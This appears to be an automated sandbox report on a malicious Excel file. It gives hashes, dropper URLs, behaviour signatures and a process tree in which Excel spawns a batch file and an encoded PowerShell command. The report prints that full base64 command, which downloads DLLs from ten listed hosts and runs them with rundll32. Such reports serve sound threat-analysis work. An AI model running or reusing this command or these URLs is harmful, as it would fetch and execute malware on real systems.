Analysis

  • max time kernel
    133s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-11-2024 21:13

General

  • Target

    8af776814a778a3cb932ff2ae370d1d02fc47c3959c243e170bb08c44ac9f089.xls

  • Size

    142KB

  • MD5

    d59046687deee1a8dc90e674f2db7388

  • SHA1

    675e0207e4d5973f5d67fd712b81c8299ca7f30e

  • SHA256

    8af776814a778a3cb932ff2ae370d1d02fc47c3959c243e170bb08c44ac9f089

  • SHA512

    14c0db04c72a51cf157159f156626f3ba40f0f63073a8a4292fb4d2e7f5d096343c52a93e07c3952f14f101972ca2b3775489bd1d103eb9424b2e03566459b0c

  • SSDEEP

    3072:F7cKoSsxzNDZLDZjlbR868O8K0c03D38TehYTdeHVhjqabWHLtyeGx6Z84TI4Gx8:hcKoSsxzNDZLDZjlbR868O8K0c03D38J

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://rkeeperua.com/include/FXBsVAOd1U/

exe.dropper

http://pozhadvokat.com/images/QmZXA9kRUU8xZZF/

exe.dropper

http://queens.renovatiog.ltd/wp-includes/LDH/

exe.dropper

http://renovatiomarketing.com/renovatiomarketing.com/A/

exe.dropper

http://remedy.eventmasti.com/vendor/Y2XclYoCdDzSSua/

exe.dropper

http://ppdbsma.insanrabbany.sch.id/gkvvb/sXVYo8HsPSFQh/

exe.dropper

http://pinnaclehomesusa.net/870xg9/pNp3a1iHCKaZwYEV/

exe.dropper

http://dandtpremierhomes.com/eapn/lpN6dcAppn/

exe.dropper

http://keluargamalaysia.bliblah.com/cgi-bin/FUzc3KOKN3DNeee/

exe.dropper

http://crisbdev.com/wp-content/2dmXYgLVdkV/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 10 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\8af776814a778a3cb932ff2ae370d1d02fc47c3959c243e170bb08c44ac9f089.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4972
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\programdata\rtyusdj.bat" "
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1472
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -enc JAByAG8AdwBpAGYAaQB1AGQAPQAiAGgAdAB0AHAAOgAvAC8AcgBrAGUAZQBwAGUAcgB1AGEALgBjAG8AbQAvAGkAbgBjAGwAdQBkAGUALwBGAFgAQgBzAFYAQQBPAGQAMQBVAC8ALABoAHQAdABwADoALwAvAHAAbwB6AGgAYQBkAHYAbwBrAGEAdAAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwBRAG0AWgBYAEEAOQBrAFIAVQBVADgAeABaAFoARgAvACwAaAB0AHQAcAA6AC8ALwBxAHUAZQBlAG4AcwAuAHIAZQBuAG8AdgBhAHQAaQBvAGcALgBsAHQAZAAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEwARABIAC8ALABoAHQAdABwADoALwAvAHIAZQBuAG8AdgBhAHQAaQBvAG0AYQByAGsAZQB0AGkAbgBnAC4AYwBvAG0ALwByAGUAbgBvAHYAYQB0AGkAbwBtAGEAcgBrAGUAdABpAG4AZwAuAGMAbwBtAC8AQQAvACwAaAB0AHQAcAA6AC8ALwByAGUAbQBlAGQAeQAuAGUAdgBlAG4AdABtAGEAcwB0AGkALgBjAG8AbQAvAHYAZQBuAGQAbwByAC8AWQAyAFgAYwBsAFkAbwBDAGQARAB6AFMAUwB1AGEALwAsAGgAdAB0AHAAOgAvAC8AcABwAGQAYgBzAG0AYQAuAGkAbgBzAGEAbgByAGEAYgBiAGEAbgB5AC4AcwBjAGgALgBpAGQALwBnAGsAdgB2AGIALwBzAFgAVgBZAG8AOABIAHMAUABTAEYAUQBoAC8ALABoAHQAdABwADoALwAvAHAAaQBuAG4AYQBjAGwAZQBoAG8AbQBlAHMAdQBzAGEALgBuAGUAdAAvADgANwAwAHgAZwA5AC8AcABOAHAAMwBhADEAaQBIAEMASwBhAFoAdwBZAEUAVgAvACwAaAB0AHQAcAA6AC8ALwBkAGEAbgBkAHQAcAByAGUAbQBpAGUAcgBoAG8AbQBlAHMALgBjAG8AbQAvAGUAYQBwAG4ALwBsAHAATgA2AGQAYwBBAHAAcABuAC8ALABoAHQAdABwADoALwAvAGsAZQBsAHUAYQByAGcAYQBtAGEAbABhAHkAcwBpAGEALgBiAGwAaQBiAGwAYQBoAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8ARgBVAHoAYwAzAEsATwBLAE4AMwBEAE4AZQBlAGUALwAsAGgAdAB0AHAAOgAvAC8AYwByAGkAcwBiAGQAZQB2AC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMgBkAG0AWABZAGcATABWAGQAawBWAC8AIgAuAFMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACgAJABzAHQAIABpAG4AIAAkAHIAbwB3AGkAZgBpAHUAZAApAHsAJAByAHIAeQBpAHUAZAA9AEcAZQB0AC0AUgBhAG4AZABvAG0AOwAkAGYAZwBoAGkAdQBzAD0ARwBlAHQALQBSAGEAbgBkAG8AbQA7ACAAJABHAHMAcgBGAEoAWQBqAGQANQA0ADYAZABzAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJAByAHIAeQBpAHUAZAArACIALgBkAGwAbAAiADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAcwB0ACAALQBPAHUAdABGAGkAbABlACAAJABHAHMAcgBGAEoAWQBqAGQANQA0ADYAZABzADsAaQBmACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAEcAcwByAEYASgBZAGoAZAA1ADQANgBkAHMAKQB7ACAAaQBmACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAEcAcwByAEYASgBZAGoAZAA1ADQANgBkAHMAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAA1ADAAMAAwADAAKQB7ACQAZwBoAEQARABGAEoASABrADUAZgA9ACIAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHMAeQBzAHcAbwB3ADYANABcAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACIAOwAkAHQAeQBpAGQAdQBpAHMAZABmAGYAPQAkAEcAcwByAEYASgBZAGoAZAA1ADQANgBkAHMAKwAiACwAZgAiACsAJABmAGcAaABpAHUAcwA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGcAaABEAEQARgBKAEgAawA1AGYAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJAB0AHkAaQBkAHUAaQBzAGQAZgBmADsAYgByAGUAYQBrADsAfQB9AH0A
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1948

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bdesug3v.pp2.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

    Filesize

    1KB

    MD5

    a0415e5d3e291395f7e8adf20272ac9c

    SHA1

    30c05104cc0bd90e2aefb107387cd031fdc72ec6

    SHA256

    eeed2b02b67dd27d6f27e28b6179aa3de342ec989c1bde5da44f860d672b1bc9

    SHA512

    8231a54598903b51fe9fe5e8369c63e04733a2cd1392389db9a94eb1c6cf1438a6c107b84d01e9dbf0afcadbd337829ea76b5f26d2c44fcf97daae510e7b452c

  • C:\programdata\rtyusdj.bat

    Filesize

    3KB

    MD5

    cfaeca812fe57984781eb36f185e6f35

    SHA1

    58c44284034e1681dca944d989b5d8ffeca6db93

    SHA256

    b52dcbf00c8e24376222b881555b4f1238820d3fdcb993df29b83b111f192c6b

    SHA512

    d69ecb57c5e3a30cffb091c4944ba96871c5dc7958d6bbbed98f05031c6e09a61449aa9babfb7a05382404f988b6ef33d3f64308ac271e04558b1486a7f62c7b

  • memory/1948-91-0x000001E83ACC0000-0x000001E83B466000-memory.dmp

    Filesize

    7.6MB

  • memory/1948-81-0x000001E83A000000-0x000001E83A022000-memory.dmp

    Filesize

    136KB

  • memory/4972-8-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

    Filesize

    2.0MB

  • memory/4972-76-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

    Filesize

    2.0MB

  • memory/4972-11-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

    Filesize

    2.0MB

  • memory/4972-10-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

    Filesize

    2.0MB

  • memory/4972-9-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

    Filesize

    2.0MB

  • memory/4972-13-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

    Filesize

    2.0MB

  • memory/4972-12-0x00007FFECA190000-0x00007FFECA1A0000-memory.dmp

    Filesize

    64KB

  • memory/4972-7-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp

    Filesize

    64KB

  • memory/4972-4-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp

    Filesize

    64KB

  • memory/4972-15-0x00007FFECA190000-0x00007FFECA1A0000-memory.dmp

    Filesize

    64KB

  • memory/4972-32-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

    Filesize

    2.0MB

  • memory/4972-0-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp

    Filesize

    64KB

  • memory/4972-5-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

    Filesize

    2.0MB

  • memory/4972-6-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

    Filesize

    2.0MB

  • memory/4972-2-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp

    Filesize

    64KB

  • memory/4972-3-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp

    Filesize

    64KB

  • memory/4972-93-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

    Filesize

    2.0MB

  • memory/4972-94-0x00007FFF0C4CD000-0x00007FFF0C4CE000-memory.dmp

    Filesize

    4KB

  • memory/4972-95-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

    Filesize

    2.0MB

  • memory/4972-96-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

    Filesize

    2.0MB

  • memory/4972-1-0x00007FFF0C4CD000-0x00007FFF0C4CE000-memory.dmp

    Filesize

    4KB

  • memory/4972-102-0x00007FFF0C430000-0x00007FFF0C625000-memory.dmp

    Filesize

    2.0MB